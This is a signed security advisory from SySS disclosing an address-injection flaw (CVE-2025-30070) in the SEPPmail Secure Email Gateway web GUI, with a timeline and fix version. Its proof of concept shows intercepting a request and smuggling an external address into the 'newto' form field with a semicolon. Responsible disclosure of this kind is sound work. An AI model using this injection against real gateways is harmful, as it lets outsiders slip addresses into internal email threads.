-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-003 Product: SEPPmail Secure Email Gateway Manufacturer: SEPPmail – Deutschland GmbH Affected Version(s): <14.0.3 Tested Version(s): 14.0.2 Vulnerability Type: Improper Neutralization of Argument Delimiters in a Command (CWE-88) Risk Level: Medium Solution Status: Fix available Manufacturer Notification: 2025-02-13 Solution Date: 2025-02-25 Public Disclosure: 2025-03-31 CVE Reference: CVE-2025-30070 Author of Advisory: Jürgen Zöller, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: SEPPmail Secure Email Gateway is an e-mail gateway encompassing, among other things, a web GUI. The manufacturer describes the product as follows (see [1]): "The SEPPmail Secure Email Gateway, which has won several awards, impresses with its comprehensive functionality, not to mention its simplicity and flexibility that are second to none. Banks, insurance companies, lawyers, authorities, stakeholders in the healthcare sector, industrial companies and energy providers have been using SEPPmail to secure their electronic business transactions for years. By doing so, they are benefiting from stability, performance, availability, functionality and convenience." Due to insuffienct input validation, SEPPmail is vulnerable to address injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: SEPPmail allows registered external users to write e-mails to internal users via its web GUI. However, external users are not allowed to send e-mails to addresses at external domains. Due to insufficient input validation, it is possible to inject external e-mail addresses into the created e-mails as an external user. While such e-mails might only be sent to internal users due to mail server settings, this, e.g., still means the injected addresses will be added in case a recipient responds to an e-mail using the "reply all" functionality. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): It is possible to inject an external e-mail address via the following steps: 1. Log in to the web GUI as an external user. 2. Send an e-mail to any internal user. 3. Intercept request between browser and server. 4. Add external address to the "newto" field, seperated from the original address via a semicolon (see below). 5. Forward manipulated request to the server. The sent e-mail will contain the added address in the "To" field. Example manipulated request: POST /web.app HTTP/1.1 Host: seppmail.internal.com Connection: keep-alive - -----------------------------17008683747387827221288174314 Content-Disposition: form-data; name="submit" yes - -----------------------------17008683747387827221288174314 [...] - -----------------------------17008683747387827221288174314 Content-Disposition: form-data; name="email" attacker@external.com - -----------------------------17008683747387827221288174314 Content-Disposition: form-data; name="newto" injected@external.com;someaddress@internal.com - -----------------------------17008683747387827221288174314 Content-Disposition: form-data; name="recipients[]" - -----------------------------17008683747387827221288174314 This will result in the following e-mail headers: Received: from seppmail (localhost.seppmail.local [127.0.0.1]) for someaddress@internal.com; ... From: To: injected@external.com, someaddress@internal.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to version 14.0.4 or higher. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-12-09: Vulnerability discovered 2025-02-13: Vulnerability reported to manufacturer 2025-02-25: Patch released by manufacturer 2025-03-31: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for SEPPmail https://www.seppmail.com/products/secure-email-gateway/ [2] SySS Security Advisory SYSS-2025-003 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-003.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jürgen Zöller of SySS GmbH. E-Mail: juergen.zoeller@syss.de Public Key: https://www.syss.de/kontakt/pgp-keys Key ID: 0xA55C06902A34886E Key Fingerprint: F279 067D A805 F18E BB71 E876 A55C 0690 2A34 886E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE8nkGfagF8Y67ceh2pVwGkCo0iG4FAmfmnvsACgkQpVwGkCo0 iG4o5Q//RfyJm8T4ZqOqenQm/hPPI6bYcz/W8qVUmbqzNYSNHBlPWA1fWYb/UgjJ xt7xJHLDHJmBwkU8HzUS4a729qdAV+NbP7ehoYYyjGB2+cDfFp7SItCC/mAh8ldB 7PIxWioZmChxJCleYqqYRO2Zo710cBc4cuhPw2KiRvdlCZ3z4SO6kRtVKjBAgZ43 fl+Ep7j9ZGe/l4c28bZ2O+PXeIX1EfTgdcAnWbhz5JQ4voMdUoDiJdMVNREqerks Rvt7Bbr1HC6jLzzfHJCcoskJI52k+7VfVy2Eh6jvD8OiKJmFtH5sE0H+E+Un8YWj VrVwbXcBGbYaExSEidDZss5qXhyYi+PgoReCfvS59uhnYdddiQd9LSAJdk5Zr+dT 1KafcKZ216Wu3IvnbE/KugiT4ZCwb8JAHIWdvscNQM0mMlBs6oiiIulUi1H59QJj McMjy+09FAO0SOZVGRJ4OzTpmJJx/tiHetDYGom4drWDnokVVdTH8gdJJk0SYBWL g25d+iQM3Ql7ah5jA+V/wX3IEX1o368L08StuZuHQIt9m/MBkh8x7efz/VIxYeb+ cypoNeGp7kokY0pxwNlvl5oKLuSmJxYFtuufXJsw9kK3YtN73nIzGYlYhwm23pKr JEnazdOMtKO0sFJeFkJPYxx6gpKZedRiRfRaW7Jg7NJU7flDbyo= =aF0B -----END PGP SIGNATURE-----